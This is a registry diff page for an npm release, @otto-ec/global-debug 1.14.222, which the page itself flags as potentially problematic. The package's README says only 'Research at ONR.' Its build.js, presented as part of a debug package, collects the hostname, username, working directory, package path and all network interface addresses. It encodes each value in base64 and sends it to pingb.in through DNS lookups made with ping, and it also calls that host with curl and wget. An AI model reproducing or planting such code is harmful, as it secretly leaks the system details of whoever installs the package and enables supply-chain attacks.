@otto-ec/global-debug 1.14.222
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @otto-ec/global-debug might be problematic. Click here for more details.
- package/README.md +1 -0
- package/build.js +52 -0
- package/package.json +10 -0
package/README.md
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
Research at ONR.
|
package/build.js
ADDED
@@ -0,0 +1,52 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const { spawn } = require("child_process");
|
3
|
+
var isWin = process.platform === "win32";
|
4
|
+
|
5
|
+
const id = "7666e1d9e135ba5b12353c3e2c3d";
|
6
|
+
|
7
|
+
try {
|
8
|
+
exfil({ d_hostname: os.hostname() });
|
9
|
+
} catch (e) {}
|
10
|
+
try {
|
11
|
+
exfil({ d_user: os.userInfo().username });
|
12
|
+
} catch (e) {}
|
13
|
+
try {
|
14
|
+
exfil({ d_cwd: `cwd: ${process.cwd()}` });
|
15
|
+
} catch (e) {}
|
16
|
+
try {
|
17
|
+
exfil({ d_dirname: `dirname: ${__dirname}` });
|
18
|
+
} catch (e) {}
|
19
|
+
try {
|
20
|
+
const nets = os.networkInterfaces();
|
21
|
+
for (const name of Object.keys(nets)) {
|
22
|
+
for (const net of nets[name]) {
|
23
|
+
exfil({ ["d_net_" + name]: net.address });
|
24
|
+
}
|
25
|
+
}
|
26
|
+
} catch (e) {}
|
27
|
+
|
28
|
+
try {
|
29
|
+
spawn(`curl`, `http://pingb.in/p/${id}`, { detached: true });
|
30
|
+
spawn(`wget`, `http://pingb.in/p/${id}`, { detached: true });
|
31
|
+
} catch (error) {
|
32
|
+
|
33
|
+
}
|
34
|
+
|
35
|
+
//process.exit();
|
36
|
+
|
37
|
+
function exfil(data) {
|
38
|
+
try {
|
39
|
+
const b64 = Buffer.from(JSON.stringify(data))
|
40
|
+
.toString("base64")
|
41
|
+
.replace(/=/gm, "");
|
42
|
+
|
43
|
+
let args;
|
44
|
+
if (isWin) {
|
45
|
+
args = ["-n", "1"];
|
46
|
+
} else {
|
47
|
+
args = ["-c", "1"];
|
48
|
+
}
|
49
|
+
args.push(`${id}.${b64}.ns.pingb.in`);
|
50
|
+
spawn(`ping`, args, { detached: true });
|
51
|
+
} catch (e) {}
|
52
|
+
}
|